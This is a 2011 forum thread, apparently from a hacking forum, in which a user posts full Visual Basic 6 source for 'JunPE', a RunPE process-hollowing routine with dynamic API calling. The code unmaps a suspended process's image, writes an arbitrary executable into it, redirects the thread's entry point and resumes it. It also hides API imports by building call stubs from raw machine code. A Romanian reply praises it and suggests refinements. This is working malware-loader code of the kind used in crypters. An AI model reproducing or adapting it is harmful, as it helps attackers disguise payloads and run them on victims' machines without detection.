Nytro Posted June 15, 2011 Report Posted June 15, 2011 [VB6] RunPe + CallApiByName (JunPE)Product: JunPEDescription: RunPe + CallApiByNameAuthor: Jhonjhon_123 - [J.J.G.P]Option Explicit' ****************************************************************************************************************************** ''' --- Autor: Jhonjhon_123 (Jhon Jairo Pro Developer)' --- Descripción: RunPe + CallApiByName' --- Distribución: Libre' --- Terminos De Uso:' --- Prohibida su comercialización.' --- No Debe eliminar los creditos.'' --- Funciones:' --- IniciarDDLL()' - Inicializa la configuración'' --- Public Sub ExecuteBytes(sName As String, bBytes() As Byte)' - RunPE' * sName: Ruta al exe' * bBytes: Bytes a ejecutar'' ****************************************************************************************************************************** 'Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long)Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As LongDeclare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As LongDeclare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As LongDim bMoveMem(36) As BytePublic Sub IniciarDDLL()Dim vTMP As VariantDim D As LongFor Each vTMP In Array(&H55, &H8B, &HEC, &H56, &H57, &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D, &H8, &H8B, &H4D, &H10, &HC1, &HE9, &H2, &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1, &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, &HC2, &H10, &H0, &H20)bMoveMem(D) = CByte(vTMP): D = D + 1NextEnd Sub'By CobeinFunction Call_(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As LongOn Error Resume NextDim lPtr As LongDim bvASM(&HEC00& - 1) As ByteDim i As LongDim lMod As LonglMod = GetProcAddress(LoadLibraryA(sLib), sMod)If lMod = 0 Then Exit FunctionlPtr = VarPtr(bvASM(0))RtlMoveMemory ByVal lPtr, &H59595958, &H4: lPtr = lPtr + 4RtlMoveMemory ByVal lPtr, &H5059, &H2: lPtr = lPtr + 2For i = UBound(Params) To 0 Step -1RtlMoveMemory ByVal lPtr, &H68, &H1: lPtr = lPtr + 1RtlMoveMemory ByVal lPtr, CLng(Params(i)), &H4: lPtr = lPtr + 4NextRtlMoveMemory ByVal lPtr, &HE8, &H1: lPtr = lPtr + 1RtlMoveMemory ByVal lPtr, lMod - lPtr - 4, &H4: lPtr = lPtr + 4RtlMoveMemory ByVal lPtr, &HC3, &H1: lPtr = lPtr + 1Call_ = CallWindowProcA(VarPtr(bvASM(0)), 0, 0, 0, 0)End Function' By Strike BotPublic Sub MoveMemory(ByVal lpDestino As Long, ByVal lpSource As Long, ByVal cBytes As Long)Call CallWindowProcA(VarPtr(bMoveMem(0)), lpDestino, lpSource, cBytes, 0)End Sub' By Jhonjhon_123Public Sub ExecuteBytes(sName As String, bBytes() As Byte)On Error Resume NextDim bIdh(63) As Byte ' IMAGE_DOS_HEADERDim bInh(247) As Byte ' IMAGE_NT_HEADERSDim bIsh(39) As Byte ' IMAGE_SECTION_HEADERDim bPi(15) As Byte ' PROCESS_INFORMATIONDim bSi(67) As Byte ' STARTUPINFODim bCtx(203) As Byte ' CONTEXT86Dim e_lfanew As LongDim ImageBase As LongDim hProcess As LongDim hThread As LongDim SizeOfImage As LongDim SizeOfHeaders As LongDim AddressOfEntryPoint As LongDim NumberOfSections As IntegerDim VirtualAddress As LongDim PointerToRawData As LongDim SizeOfRawData As LongDim Ebx As LongDim Eax As LongDim lTemp As LongDim D As LonglTemp = 68MoveMemory VarPtr(bSi(0)), VarPtr(lTemp), 4&lTemp = &H10007MoveMemory VarPtr(bCtx(0)), VarPtr(lTemp), 4&MoveMemory VarPtr(bIdh(0)), VarPtr(bBytes(0)), 64&MoveMemory VarPtr(e_lfanew), VarPtr(bIdh(60)), 4&MoveMemory VarPtr(bInh(0)), VarPtr(bBytes(e_lfanew)), 248&MoveMemory VarPtr(ImageBase), VarPtr(bInh(52)), 4&MoveMemory VarPtr(SizeOfImage), VarPtr(bInh(80)), 4&MoveMemory VarPtr(SizeOfHeaders), VarPtr(bInh(84)), 4&MoveMemory VarPtr(AddressOfEntryPoint), VarPtr(bInh(40)), 4&MoveMemory VarPtr(NumberOfSections), VarPtr(bInh(6)), 2&Call Call_("kernel32", "CreateProcessW", 0, StrPtr(sName), 0, 0, 0, &H4, 0, 0, VarPtr(bSi(0)), VarPtr(bPi(0)))MoveMemory VarPtr(hProcess), VarPtr(bPi(0)), 4&MoveMemory VarPtr(hThread), VarPtr(bPi(4)), 4&Call Call_("ntdll", "NtUnmapViewOfSection", hProcess, ImageBase)Call Call_("kernel32", "VirtualAllocEx", hProcess, ImageBase, SizeOfImage, &H1000& Or &H2000&, &H40)Call Call_("kernel32", "WriteProcessMemory", hProcess, ImageBase, VarPtr(bBytes(0)), SizeOfHeaders, 0)For D = 0 To NumberOfSections - 1MoveMemory VarPtr(bIsh(0)), VarPtr(bBytes(e_lfanew + 248& + 40& * D)), 40&MoveMemory VarPtr(VirtualAddress), VarPtr(bIsh(12)), 4&MoveMemory VarPtr(SizeOfRawData), VarPtr(bIsh(16)), 4&MoveMemory VarPtr(PointerToRawData), VarPtr(bIsh(20)), 4&Call Call_("kernel32", "WriteProcessMemory", hProcess, ImageBase + VirtualAddress, VarPtr(bBytes(PointerToRawData)), SizeOfRawData, 0)NextCall Call_("kernel32", "GetThreadContext", hThread, VarPtr(bCtx(0)))MoveMemory VarPtr(Ebx), VarPtr(bCtx(164)), 4&Call Call_("kernel32", "WriteProcessMemory", hProcess, Ebx + 8&, VarPtr(ImageBase), 4&, 0)lTemp = ImageBase + AddressOfEntryPointMoveMemory VarPtr(bCtx(176)), VarPtr(lTemp), 4&Call Call_("kernel32", "SetThreadContext", hThread, VarPtr(bCtx(0)))Call Call_("kernel32", "ResumeThread", hThread)End SubSursa: RunPe + CallApiByName (JunPE) Quote
me.mello Posted June 15, 2011 Report Posted June 15, 2011 Ce e mai frumos decat MoveMemory si CopyMemory:X super deja am idei de a imbunatati ExecuteBytes , ai postat si ceva de genu in c++ daca nu ma insel.Cam sacadeaza functia...nu vad ZeroMemory sau CloseHandle la hProcess sau hThread dar probabil a facut el versiunea standard, cand lucrezi cu astfel de functii le mai dai si free la urma, MoveMemory e o functie destul de volatila mai ales in vb.Oricum e super functia, e altceva fata de ce mai vazusem prin trecut. Quote